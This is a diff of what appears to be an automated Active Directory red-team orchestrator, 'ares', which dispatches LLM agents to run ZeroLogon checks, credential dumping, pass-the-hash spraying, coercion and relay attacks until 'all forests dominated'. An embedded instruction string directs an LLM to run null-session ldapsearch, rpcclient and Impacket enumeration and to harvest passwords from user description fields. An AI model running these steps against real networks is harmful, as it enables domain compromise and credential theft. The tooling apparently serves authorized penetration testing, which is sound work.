dispatches ZeroLogon checks. +/// Interval: 45s. +pub async fn auto_zerologon(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("zerologon") { + continue; + } + + let work: Vec<ZerologonWork> = { + let state = dispatcher.state.read().await; + collect_zerologon_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "zerologon_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "hostname": item.hostname, + }); + + let priority = dispatcher.effective_priority("zerologon"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + dc = %item.dc_ip, + domain = %item.domain, + "ZeroLogon check dispatched (CVE-2020-1472)" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ZEROLOGON, item.dc_ip.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ZEROLOGON, &item.dc_ip) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "ZeroLogon check deferred by throttler"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch ZeroLogon check"); + } + } + } + } +} + +struct ZerologonWork { + domain: String, + dc_ip: String, + hostname: String, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_ZEROLOGON, "zerologon"); + } + + #[test] + fn dedup_key_is_dc_ip() { + // ZeroLogon dedup is by DC IP since we check each DC once + let dc_ip = "192.168.58.10"; + assert_eq!(dc_ip, "192.168.58.10"); + } + + #[test] + fn no_cred_required() { + // ZeroLogon check doesn't require credentials + let _payload = serde_json::json!({ +
"technique": "zerologon_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "hostname": "dc01", + }); + } + + #[test] + fn hostname_extraction_empty_fallback() { + let hosts: Vec<(String, String)> = vec![]; + let dc_ip = "192.168.58.10"; + let hostname = hosts + .iter() + .find(|(ip, _)| ip == dc_ip) + .map(|(_, h)| h.clone()) + .unwrap_or_default(); + assert_eq!(hostname, ""); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_zerologon_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_dc() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_ZEROLOGON, "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + 
.insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed(DEDUP_ZEROLOGON, "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_resolves_hostname_from_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + } + + #[test] + fn collect_hostname_empty_when_host_not_found() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // No matching host in state.hosts + state + .hosts + .push(make_host("192.168.58.99", "other.contoso.local", false)); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].hostname, ""); + } + + #[test] + fn collect_no_credentials_still_produces_work() { + // ZeroLogon is unauthenticated, so no credentials needed + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + assert!(state.credentials.is_empty()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + } +} diff --git a/ares-cli/src/orchestrator/automation_spawner.rs b/ares-cli/src/orchestrator/automation_spawner.rs index 8278ea53..c8be2896 100644 --- a/ares-cli/src/orchestrator/automation_spawner.rs +++ b/ares-cli/src/orchestrator/automation_spawner.rs @@ -48,6 +48,41 @@ pub(crate) fn spawn_automation_tasks( spawn_auto!(auto_mssql_exploitation); spawn_auto!(auto_gpo_abuse); spawn_auto!(auto_laps_extraction); + 
spawn_auto!(auto_ntlm_relay); + spawn_auto!(auto_nopac); + spawn_auto!(auto_zerologon); + spawn_auto!(auto_print_nightmare); + spawn_auto!(auto_smb_signing_detection); + spawn_auto!(auto_share_coercion); + spawn_auto!(auto_mssql_coercion); + spawn_auto!(auto_password_policy); + spawn_auto!(auto_gpp_sysvol); + spawn_auto!(auto_ntlmv1_downgrade); + spawn_auto!(auto_ldap_signing); + spawn_auto!(auto_webdav_detection); + spawn_auto!(auto_spooler_check); + spawn_auto!(auto_machine_account_quota); + spawn_auto!(auto_dfs_coercion); + spawn_auto!(auto_petitpotam_unauth); + spawn_auto!(auto_winrm_lateral); + spawn_auto!(auto_group_enumeration); + spawn_auto!(auto_localuser_spray); + spawn_auto!(auto_krbrelayup); + spawn_auto!(auto_searchconnector_coercion); + spawn_auto!(auto_lsassy_dump); + spawn_auto!(auto_rdp_lateral); + spawn_auto!(auto_foreign_group_enum); + spawn_auto!(auto_certipy_auth); + spawn_auto!(auto_golden_cert); + spawn_auto!(auto_sid_enumeration); + spawn_auto!(auto_dns_enum); + spawn_auto!(auto_domain_user_enum); + spawn_auto!(auto_pth_spray); + spawn_auto!(auto_certifried); + spawn_auto!(auto_dacl_abuse); + spawn_auto!(auto_smbclient_enum); + spawn_auto!(auto_acl_discovery); + spawn_auto!(auto_cross_forest_enum); info!(count = handles.len(), "Automation tasks spawned"); handles diff --git a/ares-cli/src/orchestrator/blue/investigation.rs b/ares-cli/src/orchestrator/blue/investigation.rs index 7c9b5331..f673795e 100644 --- a/ares-cli/src/orchestrator/blue/investigation.rs +++ b/ares-cli/src/orchestrator/blue/investigation.rs @@ -551,6 +551,7 @@ mod tests { steps: 10, tool_calls_dispatched: 5, discoveries: Vec::new(), + llm_findings: Vec::new(), tool_outputs: Vec::new(), }; match process_outcome(&outcome, "inv1") { @@ -573,6 +574,7 @@ mod tests { steps: 3, tool_calls_dispatched: 1, discoveries: Vec::new(), + llm_findings: Vec::new(), tool_outputs: Vec::new(), }; match process_outcome(&outcome, "inv1") { diff --git a/ares-cli/src/orchestrator/bootstrap.rs 
b/ares-cli/src/orchestrator/bootstrap.rs index bee94e47..7b3ae071 100644 --- a/ares-cli/src/orchestrator/bootstrap.rs +++ b/ares-cli/src/orchestrator/bootstrap.rs @@ -8,11 +8,12 @@ use crate::orchestrator::config::OrchestratorConfig; use crate::orchestrator::dispatcher::Dispatcher; use crate::orchestrator::task_queue::TaskQueue; -/// Probe target IPs on port 88 (Kerberos) then 389 (LDAP) to find a real DC. -/// Returns the first IP that accepts a TCP connection within 500ms. -pub(crate) async fn probe_dc_port(ips: &[String]) -> Option<String> { - for port in [88u16, 389] { - for ip in ips { +/// Probe ALL target IPs on ports 88 (Kerberos) and 389 (LDAP) to find every DC. +/// Returns all IPs that accept a TCP connection within 500ms on either port. +pub(crate) async fn probe_all_dcs(ips: &[String]) -> Vec<String> { + let mut dc_ips = Vec::new(); + for ip in ips { + for port in [88u16, 389] { let addr = format!("{ip}:{port}"); if let Ok(Ok(_)) = tokio::time::timeout( std::time::Duration::from_millis(500), @@ -21,11 +22,186 @@ pub(crate) async fn probe_dc_port(ips: &[String]) -> Option<String> { .await { info!(ip = %ip, port = port, "DC probe: port open"); - return Some(ip.clone()); + dc_ips.push(ip.clone()); + break; // Found open port, skip remaining ports for this IP } } } - None + dc_ips +} + +/// Query a DC's LDAP rootDSE to discover its domain name. +/// +/// Sends a minimal anonymous LDAP SearchRequest for `defaultNamingContext`, +/// parses the DN response (e.g. `DC=child,DC=contoso,DC=local`), and +/// converts it to a domain name (`child.contoso.local`). +/// +/// Returns `None` if the connection fails, the DC doesn't respond, or the +/// response doesn't contain a parseable `defaultNamingContext`.
+pub(crate) async fn query_dc_domain(ip: &str) -> Option<String> { + use tokio::io::{AsyncReadExt, AsyncWriteExt}; + + // Pre-built LDAP SearchRequest: + // messageId=1, base="", scope=baseObject, filter=present(objectClass), + // attributes=[defaultNamingContext] + #[rustfmt::skip] + let ldap_request: &[u8] = &[ + 0x30, 0x3b, // SEQUENCE, length 59 + 0x02, 0x01, 0x01, // INTEGER messageId = 1 + 0x63, 0x36, // APPLICATION[3] SearchRequest, length 54 + 0x04, 0x00, // baseObject = "" + 0x0a, 0x01, 0x00, // scope = baseObject (0) + 0x0a, 0x01, 0x00, // derefAliases = neverDeref (0) + 0x02, 0x01, 0x00, // sizeLimit = 0 + 0x02, 0x01, 0x05, // timeLimit = 5 + 0x01, 0x01, 0x00, // typesOnly = false + 0x87, 0x0b, // present filter, length 11 + b'o', b'b', b'j', b'e', b'c', b't', b'C', b'l', b'a', b's', b's', + 0x30, 0x16, // attributes SEQUENCE, length 22 + 0x04, 0x14, // OCTET STRING, length 20 + b'd', b'e', b'f', b'a', b'u', b'l', b't', b'N', b'a', b'm', b'i', + b'n', b'g', b'C', b'o', b'n', b't', b'e', b'x', b't', + ]; + + let addr = format!("{ip}:389"); + let mut stream = match tokio::time::timeout( + std::time::Duration::from_millis(1000), + tokio::net::TcpStream::connect(&addr), + ) + .await + { + Ok(Ok(s)) => s, + _ => { + warn!(ip = %ip, "LDAP rootDSE: connection failed"); + return None; + } + }; + + if stream.write_all(ldap_request).await.is_err() { + return None; + } + + let mut buf = vec![0u8; 4096]; + let n = match tokio::time::timeout( + std::time::Duration::from_millis(2000), + stream.read(&mut buf), + ) + .await + { + Ok(Ok(n)) if n > 0 => n, + _ => return None, + }; + + let domain = parse_dn_from_ldap_response(&buf[..n]); + if let Some(ref d) = domain { + info!(ip = %ip, domain = %d, "LDAP rootDSE: discovered DC domain"); + } else { + warn!(ip = %ip, "LDAP rootDSE: could not parse defaultNamingContext"); + } + domain +} + +/// Parse `defaultNamingContext` DN from raw LDAP response bytes.
+/// +/// Locates the `defaultNamingContext` attribute name, then finds the subsequent +/// DN value containing `DC=` components and converts it to a domain name. +/// +/// Uses the BER OCTET STRING length prefix immediately preceding the `DC=` +/// payload as the authoritative end-of-DN marker. Without this, a printable-byte +/// scan would happily consume the next BER tag (0x30 SEQUENCE = ASCII '0'), +/// producing phantom domains like `contoso.local0` that poison downstream state. +fn parse_dn_from_ldap_response(data: &[u8]) -> Option<String> { + let attr_name = b"defaultNamingContext"; + let pos = data.windows(attr_name.len()).position(|w| w == attr_name)?; + + // After the attribute name, scan forward for "DC=" which starts the DN value + let remaining = &data[pos + attr_name.len()..]; + let dc_pos = remaining + .windows(3) + .position(|w| w.eq_ignore_ascii_case(b"DC="))?; + + let dn_start = pos + attr_name.len() + dc_pos; + + // Prefer the BER OCTET STRING length prefix (the byte immediately before + // `DC=`) for the DN length. Short-form only (high bit clear, non-zero). + let mut dn_end = dn_start; + if dc_pos > 0 { + let length_byte = remaining[dc_pos - 1]; + if length_byte & 0x80 == 0 && length_byte > 0 { + let length = length_byte as usize; + if let Some(end) = dn_start.checked_add(length) { + if end <= data.len() { + dn_end = end; + } + } + } + } + + // Fallback: walk only DN-legal characters (alphanumeric, `=`, `,`, `-`). + // Stops before BER tag bytes (e.g. 0x30) that happen to be ASCII printable. + if dn_end == dn_start { + dn_end = dn_start; + while dn_end < data.len() { + let b = data[dn_end]; + let is_dn_char = b.is_ascii_alphanumeric() || matches!(b, b'=' | b',' | b'-' | b'.'); + if !is_dn_char { + break; + } + dn_end += 1; + } + } + + let dn_str = std::str::from_utf8(&data[dn_start..dn_end]).ok()?; + dn_to_domain(dn_str) +} + +/// Convert an LDAP DN like `DC=child,DC=contoso,DC=local` to `child.contoso.local`.
+fn dn_to_domain(dn: &str) -> Option<String> { + let parts: Vec<&str> = dn + .split(',') + .filter_map(|component| { + let component = component.trim(); + if component.len() > 3 && component[..3].eq_ignore_ascii_case("DC=") { + Some(&component[3..]) + } else { + None + } + }) + .collect(); + + if parts.is_empty() { + return None; + } + Some(parts.join(".").to_lowercase()) +} + +/// Discover all DCs and their domains from target IPs. +/// +/// 1. Probes all IPs on ports 88/389 to find DCs +/// 2. Queries each DC's LDAP rootDSE to discover its actual domain +/// 3. Falls back to `fallback_domain` if LDAP query fails +/// +/// Returns `Vec<(domain, ip)>` with one entry per unique domain. +pub(crate) async fn discover_dc_domains( + ips: &[String], + fallback_domain: &str, +) -> Vec<(String, String)> { + let dc_ips = probe_all_dcs(ips).await; + let mut results = Vec::new(); + let mut seen_domains = std::collections::HashSet::new(); + + for ip in &dc_ips { + let domain = query_dc_domain(ip) + .await + .unwrap_or_else(|| fallback_domain.to_lowercase()); + + // First DC for each domain wins — skip duplicates (e.g. redundant DCs) + if seen_domains.insert(domain.clone()) { + results.push((domain, ip.clone())); + } + } + + results } /// Write initial operation metadata to Redis so workers can discover the operation. @@ -144,11 +320,43 @@ pub(crate) async fn dispatch_initial_recon( let payload = serde_json::json!({ "target_ip": ip, "domain": domain, + "technique": "user_enumeration", "techniques": ["user_enumeration"], "null_session": true, + "instructions": concat!( + "Enumerate domain users via UNAUTHENTICATED methods. This is a bootstrap task ", + "— we have NO credentials yet. Try these techniques in order:\n\n", + "1. Anonymous LDAP bind to enumerate users and their descriptions:\n", + " ldapsearch -x -H ldap://<target_ip> -b 'DC=<domain>,DC=<tld>' ", + "'(objectClass=user)' sAMAccountName description userPrincipalName\n\n", + "2.
RPC null session user enumeration:\n", + " rpcclient -U '' -N <target_ip> -c 'enumdomusers'\n", + " Then for each user: rpcclient -U '' -N <target_ip> -c 'queryuser <rid>'\n\n", + "3. Impacket lookupsid.py with anonymous:\n", + " lookupsid.py anonymous@<target_ip> -no-pass -domain-sids\n\n", + "4. Impacket GetADUsers.py with anonymous:\n", + " GetADUsers.py -all -dc-ip <target_ip> <domain>/ 2>/dev/null\n\n", + "5. enum4linux-ng for comprehensive SMB/RPC enumeration:\n", + " enum4linux-ng -A <target_ip>\n\n", + "CRITICAL: Look for passwords in user DESCRIPTION fields! In many AD environments, ", + "admins store passwords in the description attribute. For each user found, report ", + "the description field content. If a description looks like a password (short string, ", + "special chars, etc.), report it as a discovered credential:\n", + " {\"username\": \"samaccountname\", \"password\": \"<description content>\", ", + "\"domain\": \"<domain>\", \"source\": \"desc_enumeration\"}\n\n", + "IMPORTANT: The 'domain' field for credentials and users MUST be the AD domain the user ", + "belongs to (look at userPrincipalName suffix, or the domain reported by LDAP/RPC), NOT ", + "the local machine name or workgroup. If the target is a DC for 'contoso.local', ", + "users belong to 'contoso.local'. Use the 'domain' field from this task's payload ", + "as the default domain unless evidence shows otherwise.\n\n", + "Also report ALL discovered users in the discovered_users array:\n", + " {\"username\": \"samaccountname\", \"domain\": \"<domain>\", ", + "\"source\": \"user_enumeration\"}\n\n", + "If the target is not a DC (no LDAP/Kerberos), just report that and complete."
+        ),
     });
 
     match dispatcher
-        .throttled_submit("recon", "recon", payload, 5)
+        .throttled_submit("recon", "recon", payload, 1)
         .await
     {
         Ok(Some(task_id)) => {
@@ -162,3 +370,142 @@ pub(crate) async fn dispatch_initial_recon(
 
     count
 }
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dn_to_domain_child() {
+        assert_eq!(
+            dn_to_domain("DC=child,DC=contoso,DC=local"),
+            Some("child.contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn dn_to_domain_root() {
+        assert_eq!(
+            dn_to_domain("DC=contoso,DC=local"),
+            Some("contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn dn_to_domain_single_component() {
+        assert_eq!(dn_to_domain("DC=local"), Some("local".to_string()));
+    }
+
+    #[test]
+    fn dn_to_domain_case_insensitive() {
+        assert_eq!(
+            dn_to_domain("dc=CONTOSO,dc=LOCAL"),
+            Some("contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn dn_to_domain_with_spaces() {
+        assert_eq!(
+            dn_to_domain("DC=child, DC=contoso, DC=local"),
+            Some("child.contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn dn_to_domain_mixed_components() {
+        // DN with OU components should only extract DC parts
+        assert_eq!(
+            dn_to_domain("OU=Users,DC=contoso,DC=local"),
+            Some("contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn dn_to_domain_empty() {
+        assert_eq!(dn_to_domain(""), None);
+    }
+
+    #[test]
+    fn dn_to_domain_no_dc() {
+        assert_eq!(dn_to_domain("OU=Users,CN=admin"), None);
+    }
+
+    #[test]
+    fn parse_dn_from_ldap_response_realistic() {
+        // Simulate a response containing the attribute name followed by a BER-encoded value
+        let mut data = Vec::new();
+        data.extend_from_slice(b"\x30\x50\x02\x01\x01\x64\x4b"); // LDAP envelope
+        data.extend_from_slice(b"\x04\x00"); // objectName=""
+        data.extend_from_slice(b"\x30\x45"); // attributes SEQUENCE
+        data.extend_from_slice(b"\x30\x43"); // partial attribute SEQUENCE
+        data.extend_from_slice(b"\x04\x14"); // type OCTET STRING, len 20
+        data.extend_from_slice(b"defaultNamingContext");
+        data.extend_from_slice(b"\x31\x29"); // vals SET, len 41
+        data.extend_from_slice(b"\x04\x27"); // value OCTET STRING, len 39
+        data.extend_from_slice(b"DC=child,DC=contoso,DC=local");
+        data.push(0x00); // null terminator (end of printable range)
+
+        assert_eq!(
+            parse_dn_from_ldap_response(&data),
+            Some("child.contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn parse_dn_from_ldap_response_root_domain() {
+        let mut data = Vec::new();
+        data.extend_from_slice(b"\x30\x40\x02\x01\x01\x64\x3b");
+        data.extend_from_slice(b"\x04\x00");
+        data.extend_from_slice(b"\x30\x35\x30\x33");
+        data.extend_from_slice(b"\x04\x14");
+        data.extend_from_slice(b"defaultNamingContext");
+        data.extend_from_slice(b"\x31\x19\x04\x17");
+        data.extend_from_slice(b"DC=contoso,DC=local");
+        data.push(0x00);
+
+        assert_eq!(
+            parse_dn_from_ldap_response(&data),
+            Some("contoso.local".to_string())
+        );
+    }
+
+    #[test]
+    fn parse_dn_from_ldap_response_no_attr() {
+        let data = b"\x30\x10\x02\x01\x01\x04\x0bsomethingElse";
+        assert_eq!(parse_dn_from_ldap_response(data), None);
+    }
+
+    #[test]
+    fn parse_dn_from_ldap_response_no_dc() {
+        let mut data = Vec::new();
+        data.extend_from_slice(b"\x04\x14");
+        data.extend_from_slice(b"defaultNamingContext");
+        data.extend_from_slice(b"\x31\x0a\x04\x08");
+        data.extend_from_slice(b"OU=Users"); // No DC= in value
+        data.push(0x00);
+
+        assert_eq!(parse_dn_from_ldap_response(&data), None);
+    }
+
+    /// Regression: the OCTET STRING value MUST be bounded by its BER length
+    /// prefix. Without that bound, a printable-byte scan happily consumes the
+    /// next BER SEQUENCE tag (0x30 = ASCII '0'), producing phantom domains
+    /// like `contoso.local0` that poison the orchestrator's `domain_controllers`
+    /// keys and make the completion loop's required-forest set unsatisfiable.
+    #[test]
+    fn parse_dn_from_ldap_response_does_not_bleed_into_next_ber_tag() {
+        let mut data = Vec::new();
+        data.extend_from_slice(b"\x04\x14");
+        data.extend_from_slice(b"defaultNamingContext");
+        data.extend_from_slice(b"\x31\x15\x04\x13"); // SET len 21, OCTET STRING len 19
+        data.extend_from_slice(b"DC=contoso,DC=local"); // exactly 19 bytes
+        data.extend_from_slice(b"\x30\x10"); // next SEQUENCE: tag 0x30 ('0'), len 0x10
+        data.extend_from_slice(b"trailingjunk");
+
+        assert_eq!(
+            parse_dn_from_ldap_response(&data),
+            Some("contoso.local".to_string())
+        );
+    }
+}
diff --git a/ares-cli/src/orchestrator/callback_handler/dispatch.rs b/ares-cli/src/orchestrator/callback_handler/dispatch.rs
index 5384e179..ccf0bb52 100644
--- a/ares-cli/src/orchestrator/callback_handler/dispatch.rs
+++ b/ares-cli/src/orchestrator/callback_handler/dispatch.rs
@@ -102,6 +102,42 @@ impl OrchestratorCallbackHandler {
             attack_step: 0,
         };
 
+        // Pre-check cross-realm so the LLM gets a clear "dead-end" message
+        // rather than a misleading "queued" when request_lateral silently rejects.
+        let target_realm = {
+            let state = self.state.read().await;
+            state
+                .hosts
+                .iter()
+                .find(|h| h.ip == target_ip)
+                .and_then(|h| h.hostname.split_once('.').map(|(_, d)| d.to_lowercase()))
+        };
+        if let Some(td) = target_realm {
+            let cd = domain.to_lowercase();
+            if !cd.is_empty()
+                && cd != td
+                && !td.ends_with(&format!(".{cd}"))
+                && !cd.ends_with(&format!(".{td}"))
+            {
+                warn!(
+                    target_ip = target_ip,
+                    target_realm = %td,
+                    cred_domain = %cd,
+                    cred_user = username,
+                    technique = technique,
+                    "Rejecting cross-realm lateral from LLM — returning dead-end message"
+                );
+                return Ok(CallbackResult::Continue(format!(
+                    "REJECTED: cross-realm lateral movement ({cd} cred → {td} target at {target_ip}) \
+                     will not work. Windows strips ExtraSid RID<1000 across forests, and same-realm \
+                     auth is required for SMB/WMI/PSExec. \
+                     DO NOT retry this combination with any \
+                     {technique}/pth_*/smbexec/wmiexec/psexec variant. Instead: dispatch \
+                     forest_trust_escalation, exploit ESC8/MSSQL/ACL paths to acquire a \
+                     {td}-realm credential, or pivot via FSP membership."
+                )));
+            }
+        }
+
         let task_id = dispatcher
             .request_lateral(target_ip, &cred, technique)
             .await?;
diff --git a/ares-cli/src/orchestrator/completion.rs b/ares-cli/src/orchestrator/completion.rs
index 32cc293a..64c79776 100644
--- a/ares-cli/src/orchestrator/completion.rs
+++ b/ares-cli/src/orchestrator/completion.rs
@@ -206,10 +206,42 @@ pub async fn wait_for_completion(
                 None // Continue — waiting for golden ticket
             }
         } else {
-            // Default: continue until all forests are dominated
+            // Default: continue until all forests are dominated,
+            // then allow a post-exploitation grace period for group/ACL/ADCS
+            // enumeration to complete.
             let remaining = undominated_forests(state).await;
             if remaining.is_empty() {
-                Some("all forests dominated")
+                // Grace period: continue for 180s after all forests dominated
+                // to allow post-exploitation automation (group enum, ACL
+                // discovery, ADCS enumeration) to fire and complete.
+                // 180s needed because: automations check on 20-60s intervals,
+                // domain hashes may arrive late, and LLM tasks need time to
+                // complete LDAP queries.
+                let inner = state.read().await;
+                let all_dominated_at = inner.all_forests_dominated_at;
+                drop(inner);
+                if let Some(dominated_at) = all_dominated_at {
+                    let grace = Duration::from_secs(180);
+                    let since = dominated_at.elapsed();
+                    if since >= grace {
+                        Some("all forests dominated (post-exploitation complete)")
+                    } else {
+                        debug!(
+                            remaining_secs = (grace - since).as_secs(),
+                            "All forests dominated — post-exploitation grace period"
+                        );
+                        None // Still in grace period
+                    }
+                } else {
+                    // First time we see all forests dominated — record the timestamp
+                    let mut inner = state.write().await;
+                    inner.all_forests_dominated_at = Some(tokio::time::Instant::now());
+                    drop(inner);
+                    info!(
+                        "All forests dominated — starting 180s post-exploitation grace period"
+                    );
+                    None
+                }
             } else {
                 debug!(
                     undominated = ?remaining,
@@ -303,6 +335,43 @@ pub async fn wait_for_completion(
         }
     }
 
+    // Wait for active red team tasks and deferred queue to drain
+    // before signalling shutdown. Cap at 5 minutes to avoid hanging.
+    let red_deadline = tokio::time::Instant::now() + Duration::from_secs(300);
+    loop {
+        if *shutdown_rx.borrow() {
+            info!("Completion monitor interrupted by shutdown while waiting for red team drain");
+            break;
+        }
+
+        if tokio::time::Instant::now() >= red_deadline {
+            warn!("Red team drain deadline reached (5m) — proceeding with shutdown");
+            break;
+        }
+
+        let active_tasks = dispatcher.tracker.total().await;
+        let deferred_tasks = dispatcher.deferred.total_count().await;
+
+        if active_tasks == 0 && deferred_tasks == 0 {
+            info!("All red team tasks drained");
+            break;
+        }
+
+        info!(
+            active_tasks,
+            deferred_tasks, "Waiting for red team tasks to drain before shutdown..."
+        );
+
+        tokio::select! {
+            _ = tokio::time::sleep(Duration::from_secs(10)) => {}
+            _ = shutdown_rx.changed() => {
+                if *shutdown_rx.borrow() {
+                    break;
+                }
+            }
+        }
+    }
+
     // Signal the main loop to stop via Redis so it breaks out of its
     // select! within the next 5-second poll cycle.
     {
diff --git a/ares-cli/src/orchestrator/config.rs b/ares-cli/src/orchestrator/config.rs
index 1b467b58..0585cbd7 100644
--- a/ares-cli/src/orchestrator/config.rs
+++ b/ares-cli/src/orchestrator/config.rs
@@ -181,7 +181,7 @@ impl OrchestratorConfig {
             .ok()
             .or_else(|| detect_local_ip(target_ips.first().map(|s| s.as_str())));
 
-        let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 8);
+        let max_concurrent_tasks = parse_env("ARES_MAX_CONCURRENT_TASKS", 12);
         let heartbeat_interval_secs = parse_env("ARES_HEARTBEAT_INTERVAL_SECS", 30);
         let heartbeat_timeout_secs = parse_env("ARES_HEARTBEAT_TIMEOUT_SECS", 120);
         let result_poll_interval_ms = parse_env("ARES_RESULT_POLL_INTERVAL_MS", 500);
@@ -338,7 +338,7 @@ mod tests {
         std::env::set_var("ARES_OPERATION_ID", "test-op-1");
         let c = OrchestratorConfig::from_env().unwrap();
         assert_eq!(c.operation_id, "test-op-1");
-        assert_eq!(c.max_concurrent_tasks, 8);
+        assert_eq!(c.max_concurrent_tasks, 12);
         assert_eq!(c.heartbeat_interval, Duration::from_secs(30));
         assert!(c.target_ips.is_empty());
         assert!(c.initial_credential.is_none());
diff --git a/ares-cli/src/orchestrator/deferred.rs b/ares-cli/src/orchestrator/deferred.rs
index 48b1b111..0ade788b 100644
--- a/ares-cli/src/orchestrator/deferred.rs
+++ b/ares-cli/src/orchestrator/deferred.rs
@@ -194,6 +194,23 @@ impl DeferredQueue {
         Ok(total_evicted)
     }
 
+    /// Total number of deferred tasks across all type ZSETs.
+    pub async fn total_count(&self) -> usize {
+        let pattern = format!("{}:{}:*", DEFERRED_QUEUE_PREFIX, self.config.operation_id);
+        let mut conn = self.queue_conn();
+        let keys: Vec<String> = scan_keys_async(&mut conn, &pattern).await;
+        let mut total = 0_usize;
+        for key in &keys {
+            let count: usize = redis::cmd("ZCARD")
+                .arg(key)
+                .query_async(&mut conn)
+                .await
+                .unwrap_or(0);
+            total += count;
+        }
+        total
+    }
+
     fn queue_conn(&self) -> redis::aio::ConnectionManager {
         // TaskQueue wraps a ConnectionManager which implements Clone cheaply
         // We access it through an internal method.
diff --git a/ares-cli/src/orchestrator/dispatcher/submission.rs b/ares-cli/src/orchestrator/dispatcher/submission.rs
index fd6d0acb..2096e127 100644
--- a/ares-cli/src/orchestrator/dispatcher/submission.rs
+++ b/ares-cli/src/orchestrator/dispatcher/submission.rs
@@ -92,6 +92,21 @@ impl Dispatcher {
         }
     }
 
+    /// Submit bypassing the throttle soft/hard cap. Used by automations
+    /// whose tasks are small (single LDAP query) and must not be blocked by
+    /// long-running initial recon. Still routes through `do_submit` which
+    /// respects the per-role semaphore.
+    pub async fn force_submit(
+        &self,
+        task_type: &str,
+        target_role: &str,
+        payload: serde_json::Value,
+        priority: i32,
+    ) -> Result<Option<String>> {
+        self.do_submit(task_type, target_role, payload, priority)
+            .await
+    }
+
     /// Direct submit (bypasses throttle). Returns task_id.
     ///
     /// Routes the task to the Rust LLM agent loop. Prefers `target_role`
@@ -208,6 +223,13 @@ impl Dispatcher {
         if let Some(ref key) = cred_key {
             task_params.insert("credential_key".to_string(), serde_json::json!(key));
         }
+        // Propagate task metadata so process_completed_task can access them
+        // (mark_host_owned needs target_ip, domain attribution needs domain).
+        for key in &["target_ip", "domain"] {
+            if let Some(val) = payload.get(*key) {
+                task_params.insert(key.to_string(), val.clone());
+            }
+        }
         let task_info = ares_core::models::TaskInfo {
             task_id: task_id.clone(),
             task_type: task_type.to_string(),
@@ -253,6 +275,17 @@ impl Dispatcher {
             Some(ares_tools::parsers::merge_discoveries(&outcome.discoveries))
         };
 
+        // LLM-fabricated findings (`report_finding`,
+        // `report_lateral_success`) are kept on a SEPARATE field so
+        // `extract_discoveries` (which only reads "discoveries")
+        // never feeds them into `publish_*` state writes. Reports
+        // surface them under `llm_findings` for context only.
+        let llm_findings_json: Option<Value> = if outcome.llm_findings.is_empty() {
+            None
+        } else {
+            Some(Value::Array(outcome.llm_findings.clone()))
+        };
+
         // Collect raw tool outputs for secondary regex extraction
         let tool_outputs_json: Vec<Value> = outcome
             .tool_outputs
